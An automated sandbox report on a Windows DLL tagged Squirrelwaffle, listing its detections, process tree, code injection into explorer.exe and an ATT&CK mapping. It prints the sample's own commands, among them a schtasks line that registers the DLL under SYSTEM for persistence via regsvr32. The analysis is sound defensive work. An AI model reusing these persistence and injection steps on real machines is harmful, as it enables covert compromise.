Windows Analysis Report ZBvNS77A7a.dll

Overview

General Information

Sample Name: ZBvNS77A7a.dll
Analysis ID: 490262
MD5: 6484d8ffd4a6de7947534571e9907b4e
SHA1: 41e1cbd037698c3329db4edfe4e6b28b0654e94c
SHA256: 64a6039b2b3a347312f56170b5eb7deebe6d37ef6fb414fb929e84be4799dfa5
Tags: dll, Squirrelwaffle

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
Registers a DLL
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 5756 cmdline: loaddll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 796 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6352 cmdline: rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • explorer.exe (PID: 5620 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
    • explorer.exe (PID: 5616 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • schtasks.exe (PID: 6604 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37 MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • regsvr32.exe (PID: 5912 cmdline: regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 5944 cmdline: -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
      • WerFault.exe (PID: 1372 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 660 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • regsvr32.exe (PID: 7080 cmdline: regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 5576 cmdline: -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll' MD5: 426E7499F6A7346F0410DEAD0805586B)
      • WerFault.exe (PID: 6788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Regsvr32 Command Line Without DLL
Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 660, CommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 660, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WerFault.exe, NewProcessName: C:\Windows\SysWOW64\WerFault.exe, OriginalFileName: C:\Windows\SysWOW64\WerFault.exe, ParentCommandLine: -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll', ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 5944, ProcessCommandLine: C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 660, ProcessId: 1372

Persistence and Installation Behavior:

Sigma detected: Schedule system process
Source: Process started, Author: Joe Security, Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 5616, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37, ProcessId: 6604

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: ZBvNS77A7a.dll, Virustotal: Detection: 46%
Source: ZBvNS77A7a.dll, ReversingLabs: Detection: 60%
Machine Learning detection for sample
Source: ZBvNS77A7a.dll, Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\Desktop\ZBvNS77A7a.dll, Joe Sandbox ML: detected
Source: ZBvNS77A7a.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_1000AE9A FindFirstFileW,FindNextFileW,0_2_1000AE9A
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_1000AE9A FindFirstFileW,FindNextFileW,2_2_1000AE9A
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 4_2_0360AE9A FindFirstFileW,FindNextFileW,4_2_0360AE9A
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 5_2_00E5AE9A FindFirstFileW,FindNextFileW,5_2_00E5AE9A

System Summary:

Source: C:\Windows\SysWOW64\WerFault.exe, File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\DBG
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_1000C6CB NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,0_2_1000C6CB
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_1000CB82 memset,GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,0_2_1000CB82
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_1000C6CB NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose,2_2_1000C6CB
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 2_2_1000CB82 memset,GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary,2_2_1000CB82
Source: ZBvNS77A7a.dll.5.dr, Static PE information: No import functions for PE file found
Source: ZBvNS77A7a.dll.4.dr, Static PE information: No import functions for PE file found
Source: ZBvNS77A7a.dll.5.dr, Binary or memory string: OriginalFilenameAMStream.dllj% vs ZBvNS77A7a.dll
Source: C:\Windows\System32\regsvr32.exe, Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe, Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe, Section loaded: sfc.dll
Source: ZBvNS77A7a.dll, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe, Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37
Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Source: C:\Windows\SysWOW64\regsvr32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 660
Source: unknown, Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Source: C:\Windows\System32\regsvr32.exe, Process created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'
Source: C:\Windows\SysWOW64\regsvr32.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 652
Source: C:\Windows\SysWOW64\explorer.exe, File created: C:\Users\user\AppData\Roaming\Microsoft\Pzjqjshjoy
Source: C:\Windows\SysWOW64\WerFault.exe, File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERF241.tmp
Source: classification engine, Classification label: mal92.evad.winDLL@20/10@0/0
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_1000D52E CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,0_2_1000D52E
Source: C:\Windows\System32\loaddll32.exe, Code function: 0_2_1000AB89 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle,0_2_1000AB89
Source: C:\Windows\SysWOW64\explorer.exe, Mutant created: \Sessions\1\BaseNamedObjects\{9A57D251-8185-479A-AC5F-1814AF591876}
Source: C:\Windows\SysWOW64\explorer.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\{62D2F15B-1C9B-4191-87B4-71874D8982FF}
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \BaseNamedObjects\Local\WERReportingForProcess5944
Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \BaseNamedObjects\Local\WERReportingForProcess5576
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_01
Source: C:\Windows\SysWOW64\explorer.exe, Mutant created: \Sessions\1\BaseNamedObjects\{62D2F15B-1C9B-4191-87B4-71874D8982FF}
Source: Binary string: sfc_os.pdb5 source: WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source: Binary string: sfc.pdbK source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000004.00000003.702172421.0000000005361000.00000004.00000001.sdmp, explorer.exe, 00000005.00000003.702205579.0000000004F11000.00000004.00000001.sdmp, regsvr32.exe, 00000009.00000000.716853295.0000000010001000.00000020.00020000.sdmp, regsvr32.exe, 00000017.00000000.923266428.0000000010001000.00000020.00020000.sdmp, ZBvNS77A7a.dll.5.dr
Source: Binary string: annjrqnCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000D.00000002.764287027.0000000002C32000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000002.938813664.0000000002962000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdbvm source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.737253466.0000000003DB0000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932298953.0000000003D30000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source: Binary string: sfc.pdb source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp, WerFault.exe, 00000019.00000003.932307324.0000000003D36000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdbH{ source: WerFault.exe, 0000000D.00000003.737356835.0000000003DB6000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000D.00000003.737117016.0000000003DE1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.932275167.0000000003D61000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_030944AB push edi; mov dword ptr [esp], 00000003h 0_2_030944FE
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_030944AB push edx; mov dword ptr [esp], 00F00000h 0_2_03094507
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_030919A1 push 00000000h; mov dword ptr [esp], eax 0_2_03091C63
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_030919A1 push 00000000h; mov dword ptr [esp], edx 0_2_03091C89
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_030919A1 push 00000000h; mov dword ptr [esp], ecx 0_2_03091D27
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_030919A1 push ebp; mov dword ptr [esp], 000FFFFFh 0_2_03091EE2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1001A006 push ebx; ret 0_2_1001A007
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1001D485 push FFFFFF8Ah; iretd 0_2_1001D50E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1001D4B6 push FFFFFF8Ah; iretd 0_2_1001D50E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10019D54 push cs; iretd 0_2_10019E2A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10019E56 push cs; iretd 0_2_10019E2A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1001BB21 push esi; iretd 0_2_1001BB26
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_045844AB push edi; mov dword ptr [esp], 00000003h 2_2_045844FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_045844AB push edx; mov dword ptr [esp], 00F00000h 2_2_04584507
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_045819A1 push 00000000h; mov dword ptr [esp], eax 2_2_04581C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_045819A1 push 00000000h; mov dword ptr [esp], edx 2_2_04581C89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_045819A1 push 00000000h; mov dword ptr [esp], ecx 2_2_04581D27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_045819A1 push ebp; mov dword ptr [esp], 000FFFFFh 2_2_04581EE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_1001A006 push ebx; ret 2_2_1001A007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_1001D485 push FFFFFF8Ah; iretd 2_2_1001D50E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_1001D4B6 push FFFFFF8Ah; iretd 2_2_1001D50E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_10019D54 push cs; iretd 2_2_10019E2A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_10019E56 push cs; iretd 2_2_10019E2A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_1001BB21 push esi; iretd 2_2_1001BB26
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4_2_0361BB21 push esi; iretd 4_2_0361BB26
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4_2_03619E56 push cs; iretd 4_2_03619E2A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4_2_03619D54 push cs; iretd 4_2_03619E2A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4_2_0361A006 push ebx; ret 4_2_0361A007
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4_2_0361D4B6 push FFFFFF8Ah; iretd 4_2_0361D50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4_2_0361D485 push FFFFFF8Ah; iretd 4_2_0361D50E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00E6D4B6 push FFFFFF8Ah; iretd 5_2_00E6D50E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000DFB8 LoadLibraryA,GetProcAddress, 0_2_1000DFB8
Source: unknown Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s 'C:\Users\user\Desktop\ZBvNS77A7a.dll'

Persistence and Installation Behavior:

Source: C:\Windows\SysWOW64\explorer.exe File created: C:\Users\user\Desktop\ZBvNS77A7a.dll

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn payuhfp /tr 'regsvr32.exe -s \'C:\Users\user\Desktop\ZBvNS77A7a.dll\'' /SC ONCE /Z /ST 10:25 /ET 10:37

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Windows\System32\loaddll32.exe Memory written: PID: 5616 base: 10DF380 value: E9 4F 69 52 02
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 5620 base: 10DF380 value: E9 4F 69 D7 FF
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe TID: 4676 Thread sleep time: -100000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6616 Thread sleep count: 90 > 30
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000D02A GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,GetLastError,GetLastError,GetSystemMetrics,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW, 0_2_1000D02A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000AE9A FindFirstFileW,FindNextFileW, 0_2_1000AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 2_2_1000AE9A FindFirstFileW,FindNextFileW, 2_2_1000AE9A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4_2_0360AE9A FindFirstFileW,FindNextFileW, 4_2_0360AE9A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 5_2_00E5AE9A FindFirstFileW,FindNextFileW, 5_2_00E5AE9A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000DFB8 LoadLibraryA,GetProcAddress, 0_2_1000DFB8
Source: C:\Windows\SysWOW64\regsvr32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4_2_03605A49 RtlAddVectoredExceptionHandler, 4_2_03605A49

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Windows\System32\loaddll32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: E80000
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: C:\Windows\SysWOW64\explorer.exe base: 10DF380
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: C:\Windows\SysWOW64\explorer.exe base: E80000 protect: page read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\loaddll32.exe Memory written: PID: 5616 base: 33E0000 value: B8
Source: C:\Windows\System32\loaddll32.exe Memory written: PID: 5616 base: 347A2D8 value: 00
Source: C:\Windows\System32\loaddll32.exe Memory written: PID: 5616 base: 347B1E8 value: 00
Source: C:\Windows\System32\loaddll32.exe Memory written: PID: 5616 base: 33F0000 value: 9C
Source: C:\Windows\System32\loaddll32.exe Memory written: PID: 5616 base: 10DF380 value: E9
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 5620 base: E80000 value: 9C
Source: C:\Windows\SysWOW64\rundll32.exe Memory written: PID: 5620 base: 10DF380 value: E9
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\ZBvNS77A7a.dll',#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: explorer.exe, 00000004.00000002.951903725.0000000003E50000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000002.951903725.0000000003E50000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.951903725.0000000003E50000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.951903725.0000000003E50000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\loaddll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exe Code function: 4_2_036031C2 CreateNamedPipeA, 4_2_036031C2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100097F2 GetSystemTimeAsFileTime, 0_2_100097F2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_1000D02A GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,GetLastError,GetLastError,GetSystemMetrics,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW, 0_2_1000D02A

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Process Injection 413 | Masquerading 11 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | DLL Side-Loading 1 | Scheduled Task/Job 1 | Virtualization/Sandbox Evasion 2 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | DLL Side-Loading 1 | Process Injection 413 | Security Account Manager | Virtualization/Sandbox Evasion 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Process Discovery 3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr32 1 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll32 1 | Cached Domain Credentials | System Information Discovery 14 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

Behavior Graph

[Behavior graph. ID: 490262; Sample: ZBvNS77A7a.dll; Startdate: 25/09/2021; Architecture: WINDOWS; Score: 92]

Process chains shown in the graph:
  • loaddll32.exe -> cmd.exe -> rundll32.exe -> explorer.exe -> dropped C:\Users\user\Desktop\ZBvNS77A7a.dll (PE32)
  • loaddll32.exe -> explorer.exe -> schtasks.exe -> conhost.exe
  • regsvr32.exe -> regsvr32.exe -> WerFault.exe (two instances)

Signatures shown in the graph:
  • Sample: Multi AV Scanner detection for submitted file; Sigma detected: Schedule system process; Machine Learning detection for sample; 2 other signatures
  • loaddll32.exe: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Injects code into the Windows Explorer (explorer.exe); Maps a DLL or memory area into another process
